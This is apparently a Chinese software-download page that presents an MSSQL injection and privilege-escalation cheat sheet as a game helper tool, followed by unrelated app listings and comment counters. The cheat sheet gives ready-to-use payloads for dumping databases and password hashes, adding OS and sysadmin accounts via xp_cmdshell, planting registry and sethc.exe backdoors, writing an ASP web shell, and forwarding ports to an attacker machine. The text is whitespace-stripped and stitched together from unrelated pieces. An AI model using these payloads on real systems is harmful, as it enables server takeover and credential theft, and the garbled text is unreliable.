
类型: 游戏辅助工具 版本: V6.0
大小: 1,382.3 时间: 2025-11-13





1.爆所有库名
+union+select+name,filename,3,4,5+from+master.dbo.sysdatabases
//name数据库名filename数据库物理路径
+union+select+name,filename,3,4,5+from+master.dbo.sysdatabases+where+and+dbid=x+filename>0
//爆破数据库路径换dbid值就可以

+union+select+1,(select+name+from+master.dbo.sysdatabases+for+xml+path),3,4,5–
and0<>db_name(n)–
n改成0,1,2,3……就可以跨库
2.爆所有表名
+union+select+table_name,2,3,4,5+TABLE_CAtalog,table_schema+from+information_schema.tables–
//table_catalo保存当前数据库名称,table_name保存当前数据库中所有表
+select+name,id,crdate,4,5+from+数据库名.dbo.sysobjects+where+xtype=’u.+and+status>=0–
//name表名id表的idxtype=’u’u代表用户自定义的表crdate为数据库的创建时间ststus>=0
/+union+select+name,object_id,3,4,5+fromsys.tables–
3.爆所有字段名
+union+select+name,id,3,4,5+from+数据库名称.dbo.syscolumns+where+xtype=167+and+id=5575058–
//id是在爆破表名时候的id值syscolumns中的id和sysobjects中的id主外键关系
+union+select+name+from+syscolumns+where+charindex(‘pass’,name)>0
//查询含有“pass”的字段
+union+SELECTname,2,3,4,5FROMsyscolumnsWHEREid=(SELECTidFROMsysobjectsWHEREname=‘yixiang_bizre’)
//查询yixiang_bizre表中的所有字段
+union+select+table_name,column_name,3,4,5+from+information_schema.COLUMNS–
//table_name表名称column_name字段名
4.添加用户
1、declare@oint;
2、execmaster..sp_oacreate'Shell.Application',@oout;
3、execmaster..sp_oamethod@o,'ShellExecute',NULL,'cmd.exe','/cnetuserfuckfuck/add
5.判断是不是SQL库
andexists(select*fromsysobjects)
6.所有账户名
+union+select+(selectname+’||’+password_hashfrom+sys.sql_loginsforxmlpath),2,3,4,5+from+sys.sql_logins//
7.加SQL账户
1、--创建个登陆mssql的帐号
2、;execmaster.dbo.sp_addloginname,pass;--
3、--把创建的mssql登陆帐号提升到sysadmin
4、;execmaster.dbo.sp_addsrvrolemembername,sysadmin;--
8.启动组写入命令行和执行
EXECmaster.dbo.xp_regwrite‘HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindowsCurrentVersionRun’,’help1′,’REG_SZ’,’cmd.exe/cnetusertestptlove/add’-
9.LCX语句
;execmaster..xp_cmdshell‘D:m目录lcx.exe-slave本机ip51目标内网ip3389′–
//目标机器执行
lcx.exe-listen512007
//本机执行连接本机的的2007端口就可以了
10.win200爆目录
xp_regread读取HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesW3SVCParametersVirtualRoots–
//获取WEB路径
11.恢复xp_cmdshell
;EXECmaster.dbo.sp_addextendedproc‘xp_cmdshell’,’e:inetpubwwwrootxplog70.dll’
//把xplog70.dll文件给他上传到e:inetpubwwwroot目录下了
12.open数据
insertintoOPENROWSET(‘SQLOLEDB’,‘server=ip;uid=user;pwd=123456!’,‘selectcfromcmd’)selectusernamefromtest
//把test是本地表,中username的值插入到远程cmd表中的c字段里
13.判断权限
1、+and+1=(select+IS_SRVROLEMEMBER('sysadmin'))--
2、//sa权限
3、and(selectIS_MEMBER('db_owner'))=1-- // dbo
4、and(selectIS_MEMBER('public'))=1-- //public
14.DIR目录
遍历系统的目录结构,分析结果并发现WEB虚拟目录,先创建一个临时表:
temphttp://www.XXXX.com/FullStory.asp?id=1;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));
–接下来:我们可以利用xp_availablemedia来获得当前所有驱动器,并存入temp表中:http://www.XXXX.com/FullStory.asp?id=1;inserttempexecmaster.dbo.xp_availablemedia;–?我们可以通过查询temp的内容来获得驱动器列表及相关信息或者利用xp_subdirs获得子目录列表,并存入temp表中:http://www.XXXX.com/FullStory.asp?id=1;insertintotemp(id)execmaster.dbo.xp_subdirs‘c:’;–?
我们还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中:http://www.XXXX.com/FullStory.asp?id=1;insertintotemp(id,num1)execmaster.dbo.xp_dirtree‘c:’;–
这样就可以成功的浏览到所有的目录(文件夹)列表?如果我们需要查看某个文件的内容,可以通过执行xp_cmdsell:;insertintotemp(id)execmaster.dbo.xp_cmdshell‘typec:webindex.asp’;–?
使用’bulkinsert’语法可以将一个文本文件插入到一个临时表中。
如:bulkinserttemp(id)from‘c:inetpubwwwrootindex.asp’浏览temp就可以看到index.asp文件的内容了!通过分析各种ASP文件,可以得到大量系统信息,WEB建设与管理信息,甚至可以得到SA帐号的连接密码。
15.判断站库分离
+and+host_name()==@@servername-- //判断站库是否分离
16.存储总结
xp_availablemedia显示系统上可用的盘符’C:’xp_availablemedia
xp_enumgroups列出当前系统的使用群组及其说明xp_enumgroups
xp_enumdsn列出系统上已经设置好的ODBC数据源名称xp_enumdsn
xp_dirtree显示某个目录下的子目录与文件架构xp_dirtree‘C:inetpubwwwroot’
xp_getfiledetails获取某文件的相关属性xp_getfiledetails‘C:inetpubwwwroot.asp’
dbp.xp_makecab将目标计算机多个档案压缩到某个档案里所压缩的档案都可以接在参数的后面用豆号隔开
dbp.xp_makecab’C:lin.cab’,’evil’,1,’C:inetpubmdb.asp’
xp_unpackcab解压缩xp_unpackcab‘C:hackway.cab’,’C: emp’,1
xp_ntsec_enumdomains列出服务器域名xp_ntsec_enumdomains
xp_servicecontrol停止或者启动某个服务xp_servicecontrol‘stop’,’schedule’
xp_terminate_process用pid来停止某个执行中的程序xp_terminate_process123
dbo.xp_subdirs只列某个目录下的子目录dbo.xp_subdirs‘C:’
17.判断xp_cmdshell
+and+1=(select+count(*)+FROM+master.dbo.sysobjects+where+xtype+=‘X’+AND+name+=‘xp_cmdshell’)
18.判断系统为win2003
And+charindex('5.3',@@verisdn)
19.echo写shell
;execmaster.dbo.xp_cmdshell'echo^<scriptlanguage=VBScriptrunat=server^>executerequest^("^)^</script^>>c:\mu.asp'-
20.停掉服务
execmaster..xp_servicecontrol‘stop’,’schedule’
execmaster..xp_servicecontrol‘start’,’schedule’
有多少删减。另外添加几句个人经常用到的SQL注入和提权的语句
当xp_cmshell被删除或者无法使用的情况,我们不妨试试利用SP_OACreate和SP_OAMETHOD调用系统wscript.shell执行系统命令。
Declare@runshellINT
ExecSP_OACreate‘wscript.shell’,@runshellout
ExecSP_OAMeTHOD@runshell,’run’,null,’netuserlengflengf/add’
当这些都失败了,试试关闭系统沙盒模式,它在注册表的位置是
HKEY_LOCAL_MACHINESoftwareMicrosoftJet4.0EngineSandBoxMode
默认键值为2,即只在Access的模式下开启沙盒模式,对应的键值是
0—在任何所有者中禁止启用安全模式
1–为仅在允许范围内
2–必须在access模式下
3–完全开启
我们要将其设置为0就可以关闭了,通过SQL语句实现
Execmaster.dbo.xp_regwrite‘HKEY_LOCAL_MACHINE,’SoftwareMicrosoftJet4.0Engine’,’SandBoxMode’,’REG_DWORD’,0
执行关闭成功后就可以执行系统命令
select*fromOpenRowSet(‘Microsoft.Jet.OLEDB.4.0′,’;DataBase=c:windowssystem32iasias.mdb’,’selectshell(“netuserlengflengf/add”)’)
上面是提权思路。另外提下两种备份:
(1)Log备份(hta)
alertdatabase[dbname]setRECOVERYFULL–
createtablecmd(aimage)–
backuplog[dbname]todisk=’c:hta’withinit–
insertintocmd(a)values(‘[command]‘)–
backuplog[dbname]todisk=’系统启动目录hello.hta’–
droptablecmd–
(2)差异备份
backupdatabase[dbname]todisk=’c:db.bak’–
createtablecmd(cmdimage)–
insertintocmd(cmd)values(‘[command]‘)–
backupdatabase[dbname]todisk=’系统启动目录hello.hta’WITHDIFFERENTIALFORMAT–
droptablecmd–
经验告诉我,将你要执行的command转换成十六进制成功率会比较高,但是这个比较被动。
另外就是可以通过注册表添加run启动项添加用户命令,这种也是被动,要等服务器重启。
看了这个工具,觉得还缺少一个很使用的方法,那就是映像劫持,位于注册表位置:
HKEY_LOACAL_MACHINESoftwareMicrosoftWindowsNTCurrentVersionImageFileExecutionOptions
在这个键下面有一个Debugger的参数,如果不为空,就会处理。添加映像劫持方法的SQL语句如下:
execMaster.dbo.xp_regWrite‘HKEY_LOACAL_MACHINE’,’Software\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\sethc.exe’,’debugger’,’REG_SZ’,’c:windowssystem32cmd.exe’
菲哥哥注入语句笔记是一款sql注入工具,它可以注入一些要注意的东西,Sql注射经验,写成笔记了。当鸟动漫纯净版下载-当鸟动漫无广告版1.5.6.1 手机版
如皋综合认证app下载-如皋综合认证自助平台2.1.4.3 官方版
172.8M
这个本地人社的一个自助认证服务平台,通过这个app可以人脸办理非常多的服务功能,不用再到处跑腿了,还可以办理更多的社保服务功能,非常方便。如皋综合认证怎么用下载...
体重指数PK语音器1.0.3 官网最新版
88.7M
不用说很多的朋友都是担心自己的体重问题,都是想减肥的,或者是想知道自己的体重问题的,那么现在小编就给你介绍下面的这款体重指数PK语音器~!体重指数PK语音器介绍...
像素自由建造游戏下载安卓版-像素自由建造1.0.1 最新版
1,841.8M
像素自由建造是一款玩法上比较丰富而且自由的沙盒游戏,在游戏中会有很多的材料可以获得你可以使用这些材料来搭建自己喜欢的房屋和一些城堡,做出所有自己想要的东西,你可...
知合金服(致汇金服app)1.5.2 安卓版
1,685.6M
致汇金服app是北京极致车网科技有限公司研发的一款手机金融app,解决的汽车金融服务复杂的难题,经销商解决了客户金融服务的工具,欢迎下载体验!致汇金服app功能...
华为手机状态栏修复补丁-华为手机刷机后状态栏信号漂移修复补丁免费版
1,872.0M
有不少的朋友是喜欢对华为手机进行一些刷机的,那么一些刷完机的朋友会发现自己的手机状态栏信号图标不在应有的位置上的问题,找了很多的问题都是没有解决的,现在就可以试...
糖秒app下载-糖秒app家长版下载v1.0.0 中文免费版
706.3M
糖秒app作为一看帮助家长远程监督小孩、安排学习任务的家长端app,通过控制学生端的时间助手机器,实现实时监控还在家的学习任务完成进的和状态,十分便捷,需要的家...
百合鲜花优选1.0 最新正式版
1,061.1M
百合鲜花优选是一款在线订购鲜花、精品的APP。 无论身在何方,想送就送,再也不用担心没空去花店啦! 涵盖鲜花、永生花、精品礼品、周花等版块,...
元素塔防(Element TD)英文免安装版
1,008.2M
元素塔防(ElementTD)是一款好玩的单机塔防游戏,采用暗黑游戏风格,玩家需要在地图上建造各种炮塔、箭楼,来阻击敌人,消灭敌人后,可进入下一关卡!元素塔防游...
可怕的柠檬小姐和番茄先生游戏下载-可怕的水果柠檬和番茄恐怖游戏1.0.5 安卓版
65.3M
这是一款令人恐惧且具有挑战性的益智游戏,拥有我们古怪的食物角色-柠檬女士和番茄先生,踏上激动人心的旅程,在这里通过每一个小游戏,测试您的记忆力、思维能力和反应能...
rainy attic room中文版下载-rainy attic room中文版v1.1.9 中文版
121.0M
rainyatticroom中文版是一款优质的文字剧情游戏,外面正下着雨,独居在阁楼里的小孩非常孤单,正抑郁着,你可以和他相处,帮让走出抑郁的状态,感兴趣的小伙...
云推宝app下载-云推宝app6.4.0 安卓版
228.0M
云推宝app是一个全新优惠购物平台,这里拥有丰富的优质商品,平台每天推荐一批值得买的商品,超值优惠券,免费发放!软件介绍云推宝APP-一款自用省钱分享赚钱的购物...
寄居隅怪奇事件簿原版手机版-寄居隅怪奇事件簿原型版1.0 免费版
1,961.3M
这款游戏是超好玩的文字冒险题材游戏,以经典剧情为亮点,游戏有着很多的章节可以挑战,每一个章节都是有着不同的剧情给你,玩家通过体验游戏之中的剧情感受主人公的心理。...
魂斗罗归来体验服官网下载-魂斗罗归来体验服1.2.33.8100 官网安卓版【附资格申请】
1,524.9M
魂斗罗归来体验服是魂斗罗归来这款游戏的体验服,一般版本更新前出的新模式新玩法都会在体验服抢先试验,给大家提供最新的体验服下载,附资格申请链接,感兴趣的快来下载吧...
2017一级建造师管理答案-2017一级建造师项目管理考试试题及答案官方完整版
942.2M
2017一级建造师项目管理考试试题及答案是最近很多考生考试结束后都希望找到的一份答案,小编给大家提供的是官方完整版本下载,感兴趣的用户快来下载吧!2017一级建...
长歌游戏下载-长歌2022武侠手游2.1.2最新版
760.1M
全新武侠,上线送vip,首充6元=8万元宝,战力600w+,称霸全服,玩家将扮演少侠,通过丰富的任务系统,提升属性,实力,同时还有浪漫的情缘系统,情侣双修战斗。...
全世界历史APP下载-全世界历史免费版1.0.0 手机版
2025/10/24 23:36
完美螺旋形撞击(Perfect Spiral Hit)0.1 安卓版
2025/11/03 15:26
三国妖妖灵官方版下载-三国妖妖灵手游1.1 安卓最新版
2025/11/07 19:48
码字姬软件下载-码字姬app1.0.4 最新安卓版
2025/11/01 01:07
characterai下载最新版-characterai中文版1.10.5 安卓版
2025/11/14 07:14
我欲成仙1.2正式版下载-我欲成仙1.2正式版【附地图攻略】
2025/11/10 01:24
2017小雪节气高清壁纸下载-二十四节气小雪高清壁纸素材精选版
2025/11/01 02:37
Vfit 安卓版下载-Vfit 安卓版1.6.9 最新版
2025/10/31 01:16
教师节手绘图片下载-教师节手绘图片大全下载免费版
2025/11/05 00:46
打的车主下载-打的车主app1.0.9.2 安卓版
2025/10/30 11:59
轻暮云盘app下载-轻暮云盘最新版1.0.0 安卓版
2025/11/13 07:50
易租租房app下载-易租租房安卓版1.0.1 最新版
2025/10/25 03:30
秋季代茶饮-秋季养生代茶饮品最新整理版 【word版】
2025/11/05 22:24
搜房帮刷新高手(搜房帮全自动刷新软件)v2.0 官方绿色至尊版
2025/11/08 12:33
厦门理工-智慧后勤app1.0.13 安卓版
2025/11/06 23:10
厦门理工-智慧后勤app1.0.13 安卓版
2025/11/06 23:10更新
智慧后勤是由厦门理工学院推出的一款校园服务应用。只要为在校师生用户提供便捷的班车查询和校园保险服务。用户可以使用这款软件在线搜索班车信息,支持上、下班班车查询,...
支持 ( 145 ) 盖楼(回复)
支持 ( 100 ) 盖楼(回复)
支持 ( 36 ) 盖楼(回复)
支持 ( 57 ) 盖楼(回复)
支持 ( 88 ) 盖楼(回复)
支持 ( 58 ) 盖楼(回复)
支持 ( 14 ) 盖楼(回复)
支持 ( 120 ) 盖楼(回复)
支持 ( 190 ) 盖楼(回复)
支持 ( 17 ) 盖楼(回复)
支持 ( 136 ) 盖楼(回复)
支持 ( 164 ) 盖楼(回复)
支持 ( 148 ) 盖楼(回复)
支持 ( 108 ) 盖楼(回复)
支持 ( 159 ) 盖楼(回复)
支持 ( 97 ) 盖楼(回复)
支持 ( 153 ) 盖楼(回复)
支持 ( 24 ) 盖楼(回复)
支持 ( 105 ) 盖楼(回复)
支持 ( 103 ) 盖楼(回复)